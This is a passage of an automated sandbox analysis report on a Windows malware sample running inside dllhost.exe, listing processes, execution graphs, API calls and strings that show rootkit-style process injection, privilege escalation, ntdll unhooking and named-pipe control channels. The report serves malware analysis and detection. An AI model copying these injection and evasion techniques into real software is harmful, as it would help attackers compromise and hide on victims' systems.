                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:45
                                          Start time:12:02:36
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k appmodel -p -s StateRepository
                                          Imagebase:0x7ff7b4ee0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:46
                                          Start time:12:02:36
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\dllhost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\dllhost.exe /Processid:{d7046f2c-bae2-4413-95a8-3c99656fab22}
                                          Imagebase:0x7ff7d8730000
                                          File size:21'312 bytes
                                          MD5 hash:08EB78E5BE019DF044C26B14703BD1FA
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:47
                                          Start time:12:02:37
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc
                                          Imagebase:0x7ff7b4ee0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:false
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:48
                                          Start time:12:02:38
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\svchost.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s ShellHWDetection
                                          Imagebase:0x7ff7b4ee0000
                                          File size:55'320 bytes
                                          MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Target ID:49
                                          Start time:12:02:39
                                          Start date:12/12/2024
                                          Path:C:\Windows\System32\spoolsv.exe
                                          Wow64 process (32bit):false
                                          Commandline:C:\Windows\System32\spoolsv.exe
                                          Imagebase:0x7ff771e20000
                                          File size:842'752 bytes
                                          MD5 hash:0D4B1E3E4488E9BDC035F23E1F4FE22F
                                          Has elevated privileges:true
                                          Has administrator privileges:true
                                          Programmed in:C, C++ or other language
                                          Has exited:false

                                          Reset < >

                                            Execution Graph

                                            Execution Coverage:44.2%
                                            Dynamic/Decrypted Code Coverage:0%
                                            Signature Coverage:72.9%
                                            Total number of Nodes:251
                                            Total number of Limit Nodes:30
                                            execution_graph 527 1400036f4 528 140003701 527->528 530 140003721 ConnectNamedPipe 528->530 531 140003716 Sleep 528->531 537 140002300 AllocateAndInitializeSid 528->537 532 14000377f Sleep 530->532 533 140003730 ReadFile 530->533 531->528 535 14000378a DisconnectNamedPipe 532->535 534 140003753 WriteFile 533->534 533->535 534->535 535->530 538 14000241b 537->538 539 14000235d SetEntriesInAclW 537->539 538->528 539->538 540 1400023a1 LocalAlloc 539->540 540->538 541 1400023b5 InitializeSecurityDescriptor 540->541 541->538 542 1400023c5 SetSecurityDescriptorDacl 541->542 542->538 543 1400023dc CreateNamedPipeW 542->543 543->538 544 140003634 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc 545 14000368a K32EnumProcesses 544->545 546 1400036e7 Sleep 545->546 547 14000369f 545->547 546->545 548 1400036d8 547->548 550 140003190 547->550 548->546 551 1400031a1 550->551 552 1400031c9 550->552 556 140001868 OpenProcess 551->556 552->547 555 140001868 31 API calls 555->552 557 140001cd1 556->557 558 1400018b0 IsWow64Process 556->558 557->555 559 1400018c7 CloseHandle 558->559 559->557 561 1400018ed 559->561 561->557 562 14000192f OpenProcess 561->562 562->557 563 14000194b OpenProcess 562->563 564 140001a04 NtQueryInformationProcess 563->564 565 14000196a K32GetModuleFileNameExW 563->565 566 140001cc8 CloseHandle 564->566 567 140001a29 564->567 568 1400019b3 CloseHandle 565->568 569 140001983 PathFindFileNameW lstrlenW 565->569 566->557 567->566 571 140001a33 OpenProcessToken 567->571 568->564 570 1400019c1 568->570 569->568 572 1400019a0 StrCpyW 569->572 570->564 573 1400019e0 StrCmpIW 570->573 571->566 574 140001a51 GetTokenInformation 571->574 572->568 573->566 573->570 575 140001af4 574->575 576 140001a79 GetLastError 574->576 578 140001afb CloseHandle 575->578 576->575 577 140001a84 LocalAlloc 576->577 577->575 579 140001a9a GetTokenInformation 577->579 578->566 583 140001b0f 578->583 580 140001ae2 579->580 581 140001ac2 GetSidSubAuthorityCount GetSidSubAuthority 579->581 582 140001ae9 LocalFree 580->582 581->582 582->578 583->566 584 140001b9f StrStrA 583->584 585 140001bc8 583->585 584->583 586 140001bcd 584->586 585->566 586->566 587 140001bf8 VirtualAllocEx 586->587 587->566 588 140001c27 WriteProcessMemory 587->588 588->566 589 140001c46 588->589 597 140002bfc 589->597 591 140001c66 591->566 592 140001c74 WaitForSingleObject 591->592 593 140001c83 GetExitCodeThread 592->593 594 140001cbd CloseHandle 592->594 595 140001ca2 VirtualFreeEx 593->595 596 140001c99 593->596 594->566 595->594 596->595 600 1400020cc GetModuleHandleA 597->600 601 1400020f5 600->601 602 1400020ec GetProcAddress 600->602 602->601 603 140002d38 606 140002d4c 603->606 651 140002a0c 606->651 609 140002a0c 14 API calls 610 140002d74 GetCurrentProcessId OpenProcess 609->610 611 140002d94 OpenProcessToken 610->611 612 140002e06 RegOpenKeyExW 610->612 613 140002da8 LookupPrivilegeValueW 611->613 614 140002dfd CloseHandle 611->614 615 140002e37 RegQueryValueExW 612->615 616 140002d41 ExitProcess 612->616 613->614 617 140002dbf AdjustTokenPrivileges 613->617 614->612 615->616 618 140002e67 RegQueryValueExW 615->618 617->614 619 140002df7 GetLastError 617->619 618->616 620 140002e97 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc RegQueryValueExW 618->620 619->614 620->616 621 140002f09 RegQueryValueExW 620->621 621->616 622 140002f39 RegCloseKey GetCurrentProcessId 621->622 665 14000200c GetProcessHeap HeapAlloc 622->665 624 140002f50 RegCreateKeyExW 625 14000304a CreateThread GetProcessHeap HeapAlloc CreateThread CreateThread 624->625 626 140002f8d ConvertStringSecurityDescriptorToSecurityDescriptorW 624->626 627 14000151c 50 API calls 625->627 628 140002fb5 RegSetKeySecurity LocalFree 626->628 629 140002fcf RegCreateKeyExW 626->629 632 1400030d4 627->632 628->629 630 140003009 GetCurrentProcessId RegSetValueExW RegCloseKey 629->630 631 140003040 RegCloseKey 629->631 630->631 631->625 633 140003112 632->633 634 1400030e0 ShellExecuteW 632->634 635 14000148c 6 API calls 633->635 634->633 634->634 636 14000311a 635->636 637 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 636->637 638 140003123 637->638 639 14000148c 6 API calls 638->639 640 14000312c 639->640 641 14000148c 6 API calls 640->641 642 140003135 641->642 643 14000148c 6 API calls 642->643 644 14000313e 643->644 645 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 644->645 646 140003147 645->646 647 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 646->647 648 140003150 647->648 649 1400011d4 GetProcessHeap HeapFree GetProcessHeap HeapFree 648->649 650 140003159 GetProcessHeap HeapFree SleepEx 649->650 650->616 652 140002a15 StrCpyW StrCatW GetModuleHandleW 651->652 653 140002bdf 651->653 652->653 654 140002a66 GetCurrentProcess K32GetModuleInformation 652->654 653->609 655 140002bd6 FreeLibrary 654->655 656 140002a96 CreateFileW 654->656 655->653 656->655 657 140002acb CreateFileMappingW 656->657 658 140002af4 MapViewOfFile 657->658 659 140002bcd CloseHandle 657->659 660 140002bc4 CloseHandle 658->660 661 140002b17 658->661 659->655 660->659 661->660 662 140002b30 lstrcmpiA 661->662 664 140002b6e 661->664 662->661 663 140002b70 VirtualProtect VirtualProtect 662->663 663->660 664->660 671 140001cf0 GetProcessHeap HeapAlloc GetProcessHeap HeapAlloc K32EnumProcesses 665->671 667 1400020a5 GetProcessHeap HeapFree 668 140002050 668->667 669 140002071 OpenProcess 668->669 669->668 670 140002087 TerminateProcess CloseHandle 669->670 670->668 672 140001e58 GetProcessHeap RtlFreeHeap GetProcessHeap RtlFreeHeap 671->672 676 140001d7d 671->676 672->668 673 140001d92 OpenProcess 674 140001daf K32EnumProcessModulesEx 673->674 673->676 675 140001e43 CloseHandle 674->675 674->676 675->676 676->672 676->673 676->675 677 140001de9 ReadProcessMemory 676->677 678 140001e0b 677->678 678->675 678->676 678->677 679 140002cb0 681 140002cbd 679->681 680 140002300 6 API calls 680->681 681->680 682 140002cd2 Sleep 681->682 683 140002cdd ConnectNamedPipe 681->683 682->681 684 140002d21 Sleep 683->684 685 140002cec ReadFile 683->685 686 140002d2c DisconnectNamedPipe 684->686 685->686 687 140002d0f 685->687 686->683 687->686 689 1400031d0 687->689 690 140003413 689->690 691 1400031f7 689->691 692 140003619 690->692 693 14000341f 690->693 694 140003355 ReadFile 691->694 695 1400031fd 691->695 700 140001f7c 22 API calls 692->700 696 1400035c9 693->696 697 14000342b 693->697 698 140003330 694->698 699 14000337f 694->699 701 140003209 695->701 702 14000334c ExitProcess 695->702 703 1400020fc ReadFile 696->703 704 140003434 697->704 705 140003515 697->705 698->687 699->698 706 14000338c GetProcessHeap HeapAlloc 699->706 700->698 701->698 712 1400032c2 ReadFile 701->712 713 140003227 701->713 707 1400035d8 703->707 708 1400034e4 704->708 709 140003440 704->709 777 1400020fc 705->777 710 140001cf0 13 API calls 706->710 707->698 719 1400020fc ReadFile 707->719 774 140002c5c 708->774 709->698 715 14000344c RegOpenKeyExW 709->715 732 1400033c5 710->732 712->698 723 1400032ec 712->723 713->698 717 140003230 GetProcessHeap HeapAlloc K32EnumProcesses 713->717 720 1400034b5 715->720 721 140003479 RegDeleteValueW RegDeleteValueW RegDeleteValueW 715->721 717->698 740 14000326e 717->740 726 1400035eb 719->726 761 14000217c SysAllocString SysAllocString CoInitializeEx 720->761 721->720 722 1400033fa GetProcessHeap HeapFree 722->698 723->698 733 140001868 31 API calls 723->733 724 14000352c ReadFile 724->698 728 140003554 724->728 726->698 730 1400035ef ShellExecuteW 726->730 728->698 734 140003561 GetProcessHeap HeapAlloc ReadFile 728->734 730->698 731 1400034c1 735 14000217c 9 API calls 731->735 732->722 736 1400033f5 732->736 737 1400033f3 732->737 738 140003312 733->738 734->722 739 1400035a5 734->739 741 1400034cd 735->741 753 140001eec 736->753 737->722 743 140001868 31 API calls 738->743 739->722 781 140002434 739->781 740->698 744 1400032bd 740->744 746 140001868 31 API calls 740->746 769 140001f7c GetProcessHeap HeapAlloc 741->769 743->744 744->698 746->740 754 140001f65 753->754 755 140001f0b OpenProcess 753->755 754->722 755->754 756 140001f23 755->756 757 140002bfc 2 API calls 756->757 758 140001f43 757->758 759 140001f5c CloseHandle 758->759 760 140001f51 CloseHandle 758->760 759->754 760->759 762 1400022d8 SysFreeString SysFreeString 761->762 763 1400021bd CoInitializeSecurity 761->763 762->731 764 140002205 CoCreateInstance 763->764 765 1400021f9 763->765 766 1400022d2 CoUninitialize 764->766 767 140002234 VariantInit 764->767 765->764 765->766 766->762 768 14000228a 767->768 768->766 770 140001cf0 13 API calls 769->770 771 140001fba 770->771 772 140001fe8 GetProcessHeap HeapFree 771->772 773 140001eec 5 API calls 771->773 773->771 775 1400020cc 2 API calls 774->775 776 140002c71 775->776 778 140002120 ReadFile 777->778 779 140002143 778->779 780 14000215d 778->780 779->778 779->780 780->698 780->724 782 14000246f 781->782 806 140002726 781->806 784 1400020cc 2 API calls 782->784 805 1400024ae 782->805 782->806 783 1400024d7 CreateProcessW 783->805 784->805 785 1400028e1 OpenProcess 786 1400028f1 TerminateProcess 785->786 785->805 786->805 787 1400020cc GetModuleHandleA GetProcAddress 787->805 788 140002566 VirtualAllocEx 790 140002595 WriteProcessMemory 788->790 788->805 789 14000273f VirtualAllocEx 791 14000276d WriteProcessMemory 789->791 789->805 792 1400025b7 VirtualProtectEx 790->792 790->805 793 14000278f VirtualProtectEx 791->793 791->805 792->805 793->805 794 140002858 VirtualAlloc 798 140002879 Wow64GetThreadContext 794->798 794->805 795 140002682 VirtualAlloc 797 1400026a7 GetThreadContext 795->797 795->805 796 1400027d0 WriteProcessMemory 796->805 800 1400026c4 WriteProcessMemory 797->800 797->805 801 140002891 WriteProcessMemory 798->801 798->805 799 1400025f9 WriteProcessMemory 799->805 802 1400026ef SetThreadContext 800->802 800->805 803 1400028b6 Wow64SetThreadContext 801->803 801->805 804 140002712 ResumeThread 802->804 802->805 803->805 804->805 804->806 805->783 805->785 805->787 805->788 805->789 805->794 805->795 805->796 805->799 805->806 807 140002643 VirtualProtectEx 805->807 808 14000281a VirtualProtectEx 805->808 806->722 807->805 808->805

                                            Callgraph

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Process$Heap$Create$CloseValue$CurrentHandleQuery$AllocFileFreeOpenSecurityThread$DescriptorModuleProtectTokenVirtual$AdjustConvertErrorExecuteInformationLastLibraryLocalLookupMappingPrivilegePrivilegesShellSleepStringViewlstrcmpi
                                            • String ID: $nya-dll32$$nya-dll64$?$D:(A;OICI;GA;;;AU)(A;OICI;GA;;;BA)$SOFTWARE$SOFTWARE\$nya-config$SeDebugPrivilege$kernel32.dll$ntdll.dll$open$pid$svc64
                                            • API String ID: 3658652915-3222643892
                                            • Opcode ID: 1fbe09dec1d199788ba5218dd301b0589b924fd5f4b28719ba773b516d3b2e5d
                                            • Instruction ID: 4f21af1d6324345a54d8493184232a85d4bbe7b60dd5b863780ff56615b54280
                                            • Opcode Fuzzy Hash: 1fbe09dec1d199788ba5218dd301b0589b924fd5f4b28719ba773b516d3b2e5d
                                            • Instruction Fuzzy Hash: A5C1F2B2200A4086EB26DF22F8547DA37A5FB8CBD9F414116FB4A43A76DF38C589C744

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 45 140001868-1400018aa OpenProcess 46 140001cd1-140001ced 45->46 47 1400018b0-1400018c5 IsWow64Process 45->47 48 1400018d5 47->48 49 1400018c7-1400018d3 47->49 50 1400018db-1400018e7 CloseHandle 48->50 49->50 50->46 51 1400018ed-1400018f8 50->51 51->46 52 1400018fe-140001913 51->52 53 140001925 52->53 54 140001915-14000191a 52->54 56 140001927-140001929 53->56 54->46 55 140001920-140001923 54->55 55->56 56->46 57 14000192f-140001945 OpenProcess 56->57 57->46 58 14000194b-140001964 OpenProcess 57->58 59 140001a04-140001a23 NtQueryInformationProcess 58->59 60 14000196a-140001981 K32GetModuleFileNameExW 58->60 61 140001cc8-140001ccb CloseHandle 59->61 62 140001a29-140001a2d 59->62 63 1400019b3-1400019bf CloseHandle 60->63 64 140001983-14000199e PathFindFileNameW lstrlenW 60->64 61->46 62->61 66 140001a33-140001a4b OpenProcessToken 62->66 63->59 65 1400019c1-1400019db 63->65 64->63 67 1400019a0-1400019b0 StrCpyW 64->67 68 1400019e0-1400019f2 StrCmpIW 65->68 66->61 69 140001a51-140001a77 GetTokenInformation 66->69 67->63 68->61 70 1400019f8-140001a02 68->70 71 140001af4 69->71 72 140001a79-140001a82 GetLastError 69->72 70->59 70->68 74 140001afb-140001b09 CloseHandle 71->74 72->71 73 140001a84-140001a98 LocalAlloc 72->73 73->71 75 140001a9a-140001ac0 GetTokenInformation 73->75 74->61 76 140001b0f-140001b16 74->76 78 140001ae2 75->78 79 140001ac2-140001ae0 GetSidSubAuthorityCount GetSidSubAuthority 75->79 76->61 77 140001b1c-140001b27 76->77 77->61 80 140001b2d-140001b37 77->80 81 140001ae9-140001af2 LocalFree 78->81 79->81 82 140001b52 80->82 83 140001b39-140001b43 80->83 81->74 85 140001b56-140001b8e call 1400029a4 * 3 82->85 83->61 84 140001b49-140001b50 83->84 84->85 85->61 92 140001b94-140001bb4 call 1400029a4 StrStrA 85->92 95 140001bb6-140001bc6 92->95 96 140001bcd-140001bf2 call 1400029a4 * 2 92->96 95->92 97 140001bc8 95->97 96->61 102 140001bf8-140001c21 VirtualAllocEx 96->102 97->61 102->61 103 140001c27-140001c40 WriteProcessMemory 102->103 103->61 104 140001c46-140001c68 call 140002bfc 103->104 104->61 107 140001c6a-140001c72 104->107 107->61 108 140001c74-140001c81 WaitForSingleObject 107->108 109 140001c83-140001c97 GetExitCodeThread 108->109 110 140001cbd-140001cc2 CloseHandle 108->110 111 140001ca2-140001cbb VirtualFreeEx 109->111 112 140001c99-140001c9f 109->112 110->61 111->110 112->111
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Process$CloseHandle$Open$InformationToken$AllocAuthorityFileFreeLocalNameVirtual$CodeCountErrorExitFindLastMemoryModuleObjectPathQuerySingleThreadWaitWow64Writelstrlen
                                            • String ID: @$MSBuild.exe$MsMpEng.exe$ReflectiveDllMain
                                            • API String ID: 2456419452-2628171563
                                            • Opcode ID: 2b16a00b8169fba4865d38f395e3f4d07e54227767ca222d3906c7a16431a916
                                            • Instruction ID: aa2e9c602b366f086df46edbb2d603c4cad306d9795ea9e87325920370297f3c
                                            • Opcode Fuzzy Hash: 2b16a00b8169fba4865d38f395e3f4d07e54227767ca222d3906c7a16431a916
                                            • Instruction Fuzzy Hash: 93C14BB1700A8186EB66DF23B8907EA23A5FB89BC4F444125EF4A477A4DF38C985C744

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 113 1400031d0-1400031f1 114 140003413-140003419 113->114 115 1400031f7 113->115 116 140003619 call 140001f7c 114->116 117 14000341f-140003425 114->117 118 140003355-140003379 ReadFile 115->118 119 1400031fd-140003203 115->119 122 14000361e-140003630 116->122 120 1400035c9-1400035dc call 1400020fc 117->120 121 14000342b-14000342e 117->121 118->122 123 14000337f-140003386 118->123 125 140003209-14000320c 119->125 126 14000334c-14000334e ExitProcess 119->126 120->122 143 1400035de-1400035ed call 1400020fc 120->143 128 140003434-14000343a 121->128 129 140003515-140003526 call 1400020fc 121->129 123->122 130 14000338c-1400033c0 GetProcessHeap HeapAlloc call 140001cf0 123->130 131 140003212-140003215 125->131 132 14000333d-140003347 125->132 136 1400034e4-14000350e call 140002c5c call 140002c88 ExitProcess 128->136 137 140003440-140003446 128->137 129->122 155 14000352c-14000354e ReadFile 129->155 145 1400033c5-1400033c7 130->145 133 14000321b-140003221 131->133 134 140003330-140003338 131->134 132->122 140 1400032c2-1400032e6 ReadFile 133->140 141 140003227-14000322a 133->141 134->122 137->122 144 14000344c-140003477 RegOpenKeyExW 137->144 140->122 154 1400032ec-1400032f3 140->154 141->122 147 140003230-140003268 GetProcessHeap HeapAlloc K32EnumProcesses 141->147 143->122 165 1400035ef-140003617 ShellExecuteW 143->165 150 1400034b5-1400034df call 14000217c * 2 call 140001f7c call 1400017a8 call 14000200c 144->150 151 140003479-1400034af RegDeleteValueW * 3 144->151 152 1400033c9-1400033cf 145->152 153 1400033fa-14000340e GetProcessHeap HeapFree 145->153 147->122 156 14000326e-14000327f 147->156 150->122 151->150 152->153 160 1400033d1-1400033e3 152->160 153->122 154->122 161 1400032f9-14000332b call 140001868 * 2 154->161 155->122 162 140003554-14000355b 155->162 156->122 163 140003285-1400032bb call 140001868 * 2 156->163 167 1400033e5-1400033e7 160->167 168 1400033e9-1400033f1 160->168 161->122 162->122 170 140003561-14000359f GetProcessHeap HeapAlloc ReadFile 162->170 189 1400032bd 163->189 165->122 167->168 173 1400033f5 call 140001eec 167->173 168->160 174 1400033f3 168->174 170->153 176 1400035a5-1400035b1 170->176 173->153 174->153 176->153 181 1400035b7-1400035c4 call 140002434 176->181 181->153 189->122
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Process$Heap$Open$File$AllocCloseDeleteHandleInformationTokenValue$AuthorityFreeLocalNameRead$CountEnumErrorExitFindLastModulePathProcessesQueryWow64lstrlen
                                            • String ID: $nya-dll32$$nya-dll64$$nya-stager$$nya-svc32$$nya-svc64$SOFTWARE$open
                                            • API String ID: 2078740077-1712970621
                                            • Opcode ID: f7c68859b52914e3334372da6bae20eccf7175c030ed6d90c0cd16e79758e7fd
                                            • Instruction ID: c8d4f342e40e6777a9670b8351b23a9f9beb54452381f7607bad1af34793ce04
                                            • Opcode Fuzzy Hash: f7c68859b52914e3334372da6bae20eccf7175c030ed6d90c0cd16e79758e7fd
                                            • Instruction Fuzzy Hash: 0FB106F120468196EB7BDF27B8543E922A9F74C7C4F448125BB0A47ABADF39C645C704

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: Heap$Process$AllocEnumFree$CloseHandleMemoryModulesOpenProcessesRead
                                            • String ID:
                                            • API String ID: 4084875642-0
                                            • Opcode ID: f02ff77e7f4e077cdd12b46490152bc7a80db30c6c4fa853e392340b29967d71
                                            • Instruction ID: e2e15449054ed3f9ee7818d53de513bd52f9f3644679b514a33cb2e068489f8a
                                            • Opcode Fuzzy Hash: f02ff77e7f4e077cdd12b46490152bc7a80db30c6c4fa853e392340b29967d71
                                            • Instruction Fuzzy Hash: 1B5158B2711A808AEB66DF63F8587EA22A1F78DBC4F804025EF595B764DF38C585C700

                                            Control-flow Graph

                                            APIs
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: DescriptorInitializeSecurity$AllocAllocateCreateDaclEntriesLocalNamedPipe
                                            • String ID:
                                            • API String ID: 3197395349-0
                                            • Opcode ID: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                            • Instruction ID: 08f0d969cdc459eeaae67e0f3491139f795acf93ec6e34b01acc3ed94c40f622
                                            • Opcode Fuzzy Hash: 37e6648599b0826955785ac87fece2d8239bb794969fe8891e8706d602f244c1
                                            • Instruction Fuzzy Hash: 173169B2214691CAE761CF25F4807DE77A4F748798F40422AFB4947EA8DB78C259CB44

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: FileHandle$CloseCreateModuleProtectVirtual$CurrentFreeInformationLibraryMappingProcessViewlstrcmpi
                                            • String ID: .text$C:\Windows\System32\
                                            • API String ID: 2721474350-832442975
                                            • Opcode ID: c686aa51e377184264062a0a3ec39641cbabcbb6b6338b4f9c9e14a722750aea
                                            • Instruction ID: 2da0f49b8f504828cf99bd1c35657877bba6dbaefb57c64c0b3462adf03dc19e
                                            • Opcode Fuzzy Hash: c686aa51e377184264062a0a3ec39641cbabcbb6b6338b4f9c9e14a722750aea
                                            • Instruction Fuzzy Hash: 59517BB230468086EB62DF16F9587DA73A1FB8CBD5F444625AF4A03BA8DF38C548C704

                                            Control-flow Graph

                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
                                            • String ID: M$\\.\pipe\$nya-childproc
                                            • API String ID: 2203880229-802795868
                                            • Opcode ID: a9b0775309c1033bdde321130d9dbfa8a5fd9d512a1023e9268893db04bfe7f9
                                            • Instruction ID: 5f21e6060fcfdf5e456d3793ca8ca668dea709d71954cc69c9167fab55033164
                                            • Opcode Fuzzy Hash: a9b0775309c1033bdde321130d9dbfa8a5fd9d512a1023e9268893db04bfe7f9
                                            • Instruction Fuzzy Hash: 0E1179F1208A4082E726EB22F8147EA6760E78DBE0F444225FB5A036F5CF7CC548CB00

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 238 140002cb0-140002cba 239 140002cbd-140002cd0 call 140002300 238->239 242 140002cd2-140002cdb Sleep 239->242 243 140002cdd-140002cea ConnectNamedPipe 239->243 242->239 244 140002d21-140002d26 Sleep 243->244 245 140002cec-140002d0d ReadFile 243->245 246 140002d2c-140002d35 DisconnectNamedPipe 244->246 245->246 247 140002d0f-140002d14 245->247 246->243 247->246 248 140002d16-140002d1d call 1400031d0 247->248 249 140002d1f 248->249 249->246
                                            APIs
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000007.00000002.1741826799.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
                                            • Associated: 00000007.00000002.1741741840.0000000140000000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741912250.0000000140004000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            • Associated: 00000007.00000002.1741996041.0000000140007000.00000002.00000001.00020000.00000000.sdmpDownload File
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_7_2_140000000_dllhost.jbxd
                                            Similarity
                                            • API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
                                            • String ID: \\.\pipe\$nya-control
                                            • API String ID: 2071455217-2728758917
                                            • Opcode ID: ea5d0e36b259e0d9586660e08200355551478b737e680bb1466d0a5669cd7301
                                            • Instruction ID: fae886f8300dcbc0ba88151123110c58f904b6dff6578ae57d5354566521a009
                                            • Opcode Fuzzy Hash: ea5d0e36b259e0d9586660e08200355551478b737e680bb1466d0a5669cd7301
                                            • Instruction Fuzzy Hash: 6F011AB1214A0482FB16EB23F8547E9A360A79DBE1F154225FB67436F5DF78C888C704

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
